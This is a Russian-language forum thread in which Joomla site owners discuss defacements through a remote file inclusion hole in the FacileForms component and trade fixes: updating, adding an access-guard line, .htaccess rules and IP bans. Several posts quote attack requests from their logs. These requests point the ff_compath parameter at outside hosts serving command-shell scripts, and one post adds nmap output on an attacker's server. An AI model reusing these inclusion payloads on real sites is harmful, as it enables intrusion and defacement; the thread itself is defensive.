Дефейснули 3 сайта через дыру в компоненте FacileForms 1.4.4 - FacileForms

C помощью дыры в компоненте FacileForms версии 1.4.4 у меня сегодня отдефейсили 3 сайта!
Хочу конешно выразить спасибо команде "cyber_error", которые произвели дефейс, что ничего не поломали, старый index.php аккуратно переименовали в old, но всё равно как-то не очень приятно

Дыра, через которую дефейсили, находится в файле facileforms.frame.php, который запускал на исполнение скрипты:
http://www.acuariopeces.com/pnTemp/cmd.dat


Урл, через который всё это запускалось, выглядел так:
POST /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sv-sirzenich.de/images/c.jpg? HTTP/1.0

Ломануть получилось у них только через второй скрипт.

Причём, что интересно, ломанули не сам сайт, на котором был данный компонент, а соседние! По адресу находится скрипт, которому передаются команды и он умеет лазить по папкам и творить всякие другие интересные вещи...

Лечится либо удалением данного файла либо обновлением до новой версии. Так что всем, кто использует данный компонент, рекомендую в срочном порядке обновиться до новой версии и выпонить рекомендации, написанные на главной странице сайта http://facileforms.biz/

В Рунете вообще про то, что нашли дыру в FacileForms, тишина, вот поэтому и не получилось вовремя заклеить дырку пластырем

в КАЖДОМ php-файле ДОЛЖНА в начале присутствовать строка
defined( '_VALID_MOS' ) or die( 'Restricted access' );
иначе совместно со включенным register globals эти взломы будут везде.

В Рунете вообще про то, что нашли дыру в FacileForms, тишина, вот поэтому и не получилось вовремя заклеить дырку пластырем

ну я бы не сказал, что совсем тишина... в частности, в новости про FacileForms 1.4.6с мы же писали, что разработчики устранили уязвимости и настоятельно рекомендуют обновиться... а вот на Secunia вроде сообщений об уязвимости не было, и в официальном списке уязвимых расширений на форуме Joomla данный компонент тоже не числится...

ну я бы не сказал, что совсем тишина... в частности, в новости про FacileForms 1.4.6с мы же писали, что разработчики устранили уязвимости и настоятельно рекомендуют обновиться...

Там в списке уязвимостей написано только про SQL injection, а не про то, что можно любой php-код на сайте выполнить.

Всем добрый вечер.
Всталкнулся с такой бедой , пытаються ломонуть мой сайт перед апом ya, с помощью 83.143.162.10 - - [15/Mar/2007:23:38:03 +0300] "GET /com_facileforms/facileforms.frame.php?ff_compath=http://www.yenzero.com/wp-admin/c.in?? HTTP/1.1" 200 25972

Пробовал банить по входящим Ip тоесть 83.143.162.10, не помогает пользуються проксями
проверил сайта www.yenzero.com не существует, просканил Nmapom выдает
Initiating SYN Stealth Scan against server1.wisd0m.net (216.12.200.18) [1672 ports] at 23:41
Discovered open port 80/tcp on 216.12.200.18
Discovered open port 21/tcp on 216.12.200.18
Discovered open port 25/tcp on 216.12.200.18
Discovered open port 443/tcp on 216.12.200.18
Discovered open port 22/tcp on 216.12.200.18
Discovered open port 110/tcp on 216.12.200.18
Discovered open port 3306/tcp on 216.12.200.18
Discovered open port 143/tcp on 216.12.200.18
Discovered open port 993/tcp on 216.12.200.18
Discovered open port 995/tcp on 216.12.200.18
The SYN Stealth Scan took 38.68s to scan 1672 total ports.
Host server1.wisd0m.net (216.12.200.18) appears to be up ... good.
Забанил

что посоветуете, стоит com_facileforms 1.4.7re

что посоветуете, стоит com_facileforms 1.4.7re

очень странно, эту дыру вроде ж давно закрыли... проверьте, что в начале файла /com_facileforms/facileforms.frame.php? есть строчка:

defined( '_VALID_MOS' ) or die( 'Restricted access' );

так нету у меня этого файла

здесь

83.143.162.10 - - [15/Mar/2007:23:38:03 +0300] "GET /com_facileforms/facileforms.frame.php?ff_compath=http://www.yenzero.com/wp-admin/c.in?? HTTP/1.1" 200 25972

написано обратное...

Я сам раз десять проверил , в бекапах тоже , нет . в админ\сом_фацилаформ тоже нет ????

Люди помогите отловить гад*** , опять пытються дефейснуть????
172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.ph
p?ff_compath=http://www.grodmansskolan.se/cmd.txt?

покажи конец строчки

зы. это логи случаем не с винроута?

172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 27650
 никому плохого не  делал, ни кого не обижал. Наверное жадные конкуренты , давяться что я в yandex топе


нет apache

200 27650

нифига не понимаю...
утвердительный ответ на запрос (200=ОК) и размер файла 27650 байт....
ну была отдача или я чего-то недопонимаю...

ps. очень рекомендую воспользоваться htaccess.txt (переименовать в .htaccess)

делаю запрос GET /components/com_facileforms/facileforms.frame.php ответ 404
 .htaccess есть, настроен от эксплойтов но видно слабо настроен
А определить того как определить откуда ?
адрес определил nmapom .grodmansskolan.se -  212.75.88.27 вчерашний 216.12.200.18

забанил
что делать дальше?

так какая сейчас у тебя версия фасили и джумлы?
htaccess от какой версии?

Joomla последняя фацила 1.4.7

1.

172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 27650

2.

делаю запрос GET /components/com_facileforms/facileforms.frame.php ответ 404

кто-то их вас двоих не прав

да знаю, что протеворечят ответы, но сам не могу понять, почему

вообще я считаю эти формы не нужны ..
что стоит написать модуль или бот с нужной формой сро всеми вкусностями кот. в данном случае нужны